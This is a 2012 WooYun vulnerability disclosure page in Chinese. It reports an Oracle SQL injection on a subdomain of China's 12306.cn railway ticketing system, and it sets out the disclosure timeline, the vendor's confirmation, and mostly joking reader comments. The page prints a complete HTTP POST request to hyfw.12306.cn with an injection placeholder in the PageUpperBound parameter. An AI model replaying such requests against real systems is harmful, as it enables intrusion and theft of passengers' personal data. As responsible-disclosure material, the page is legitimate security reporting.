当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012506

漏洞标题:中国铁路订票系统(12306.cn)分站注入漏洞

相关厂商:中国铁道科学研究院

漏洞作者: 不走的钟

提交时间:2012-09-21 09:11

修复时间:2012-11-05 09:11

公开时间:2012-11-05 09:11

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-21: 细节已通知厂商并且等待厂商处理中
2012-09-21: 厂商已经确认,细节仅向厂商公开
2012-10-01: 细节向核心白帽子及相关领域专家公开
2012-10-11: 细节向普通白帽子公开
2012-10-21: 细节向实习白帽子公开
2012-11-05: 细节向公众公开

简要描述:

12306相关站都使用了CDN,无法确定服务器真实IP,但通过这个Oracle注入可以获取到真实的IP,以及杀入内部网络哦。

详细说明:

代码:
POST /hyinfo/action/FwcszsAction_hyblzxx HTTP/1.1
Host: hyfw.12306.cn
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://hyfw.12306.cn/hyinfo/action/FwcszsAction_index?type=1
Content-Length: 92
Cookie: TVvHsVfkbo=MDAwM2IyOWE2NjgwMDAwMDAwMDIwRgdEdwkxMzQ4MTg4MDI0; JSESSIONID=ghStQbGDl5RXk9tBgdxkQQtyQdNv1DpycvQnXQnpTL0pdv7lPS0f!579138310
Pragma: no-cache
Cache-Control: no-cache
LJDM=&dz2=&hzzm=煤山&sheng=&lxs=0&PageUpperBound=10+sqlcode&PageLowerBound=0&Pagenum=1

漏洞证明:

修复方案:

这个大家都知道

版权声明:转载请注明来源 不走的钟@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2012-09-21 17:58

厂商回复:

确认漏洞,正在处理中,谢谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2012-09-21 09:13 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    前排占座

  2. 2012-09-21 09:13 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    1.99亿,亲

  3. 2012-09-21 09:23 | 剑心 ( 实习白帽子 | Rank:37 漏洞数:9 | xsser)

    我信洞主

  4. 2012-09-21 09:35 | piaoye ( 普通白帽子 | Rank:343 漏洞数:53 | ww)

    等,今天排了两个小时还没登陆进去。。。。求楼主给订票

  5. 2012-09-21 09:41 | 無情 ( 实习白帽子 | Rank:41 漏洞数:5 | 根据相关法律法规和政策,此信息未予显示。)

    1.99亿,亲

  6. 2012-09-21 09:49 | 汉时明月 ( 实习白帽子 | Rank:40 漏洞数:6 | ‮......核审在正名签 :)

    赶快说下IP

  7. 2012-09-21 10:28 | 笑傲浆糊 ( 路人 | Rank:12 漏洞数:1 | 没死,还活在)

    洞主,求订票哎~~~~

  8. 2012-09-21 10:54 | 狗肉盖饭 ( 路人 | Rank:10 漏洞数:1 | 狗肉盖饭,我的最爱!)

    1.99亿开发出了一套泄漏全民信息系统!!!

  9. 2012-09-21 12:13 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    这数据能值1.9E,破系统就不值钱了

  10. 2012-09-21 12:37 | El4pse ( 路人 | Rank:29 漏洞数:7 | 世界上从来没有不可能这几个字,可不可能完...)

    求票。。

  11. 2012-09-21 12:53 | 小猪太子 ( 实习白帽子 | Rank:41 漏洞数:8 | 地球人)

    1.99E哦,亲

  12. 2012-09-21 13:05 | 冰锋刺客 ( 普通白帽子 | Rank:113 漏洞数:14 | 请在监护人陪同下与本人交流)

    1.99亿还是第一期工程 =.= 瀑布汗

  13. 2012-09-21 14:03 | 不走的钟 ( 路人 | Rank:22 漏洞数:2 | 关注网络安全!)

    @蟋蟀哥哥 签名太牛X了。

  14. 2012-09-21 15:45 | Viigoss ( 实习白帽子 | Rank:36 漏洞数:5 | viigoss)

    第七届那个分站?库里没东西啊

  15. 2012-09-21 17:24 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    与 dynamic.12306.cn 的连接已中断。错误 101 (net::ERR_CONNECTION_RESET):连接已重置。难道……

  16. 2012-09-21 18:50 | gin__ ( 路人 | Rank:9 漏洞数:1 | 我这种高富帅一直很低调,从来都不会高估自...)

    关注